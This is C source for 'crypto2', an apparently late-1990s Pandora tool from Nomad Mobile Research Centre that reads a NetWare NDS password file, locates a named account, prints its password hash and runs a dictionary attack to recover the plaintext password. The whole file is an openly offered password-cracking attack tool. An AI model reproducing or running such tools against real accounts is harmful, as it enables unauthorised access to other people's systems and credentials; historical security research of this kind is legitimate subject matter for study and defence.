#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "..\pandora\pan_file.h"
#include "..\pandora\pan_hash.h"

/*
 * Print some usage info....
 */
void printHelp(int j)
{
   printf("\nUSAGE: crypto2 <dictionary> -u <account>\n");
   printf("  -h           prints this HELP file.\n");
   printf("EXAMPLE:\n");
   printf("  crypto2 biglist.wrd -u Admin\n");
   exit(j);
}

/*
 * Main prog...
 */

int main(int argc, char *argv[])
{
   char *dict,*retpw;
   int i,t,err,FOUND=FALSE;
   char *account;
   Pan_PassList pPassList,q;
   Pan_PassHack pPassHack;

   account=(char *)calloc(1,sizeof(char)*MAX_CHARS);
   dict=(char *)calloc(1,sizeof(char)*MAX_CHARS);

/* Say hello... */
   printf("\n\nCRYPTO2 - Dictionary Attack \n");
   printf("Comments/bugs: pandora@nmrc.org\n");
   printf("http://www.nmrc.org/pandora\n");
   printf("1997,1998 (c) Nomad Mobile Research Centre\n");

   if (argc<2) printHelp(1);

   /* process command line switches, if any... */
   for (i=1 ; i<argc ; i++)
   {
      if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
	    case 'h':
	    case 'H':
            case '?':
	       printHelp(0);
	    case 'u':
	    case 'U':
               if ((i+1>argc) || argv[i+1]==NULL)
	       {
		  printf("No argument given for option -u\n");
		  printHelp(-1);
	       }
               if (argv[i+1][0]=='-')
               {
                  printf("No argument given for option -u\n");
                  printHelp(-1);
               }
               sprintf(account,"%s",argv[i+1]);
               FOUND=TRUE;
	       break;
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(-1);
	 }
   }

 if (!FOUND) {printf("No user name given\n");
              exit(-1);}
 sprintf(dict, "%s", argv[1]);

 err=Pan_PassList_read("PASSWORD.NDS",&pPassList);
 if (err) {printf("err : %d",err);
           exit(-1);}

 for (q=pPassList;q!=NULL;q=q->next)
  {FOUND=TRUE;
   for (i=0;i<strlen(account);i++)
    {t=i*2+6;
     if (account[i]!=q->userCN[t]) FOUND=FALSE;
    }
   if (FOUND==TRUE) break;
  }
 if (!q)
  {printf("%s not found in password file.\n",account);
   Pan_PassList_free(pPassList);
   exit(1);
  }

 Pan_PassList_to_PassHack(q,&pPassHack);
 Pan_PassList_free(pPassList);

 printUnicodeName(pPassHack.userCN,258); printf(" ");
 printUnicodeName(pPassHack.userOU,40);
 printf(" id-%08lx parentID-%08lx objectID-%08lx pwlen-%d\n\n read hash - ",
 pPassHack.id,pPassHack.parentID,pPassHack.objectID,pPassHack.pwlen);
 for (i=0;i<16;i++) printf("%02x",pPassHack.hash[i]);

 err=Pan_Dict_Attack(&pPassHack,&retpw,dict);
 if (err) {printf("\n err : %d",err);
           exit(-1);}
 else printf("\n  password - %s",retpw);
}
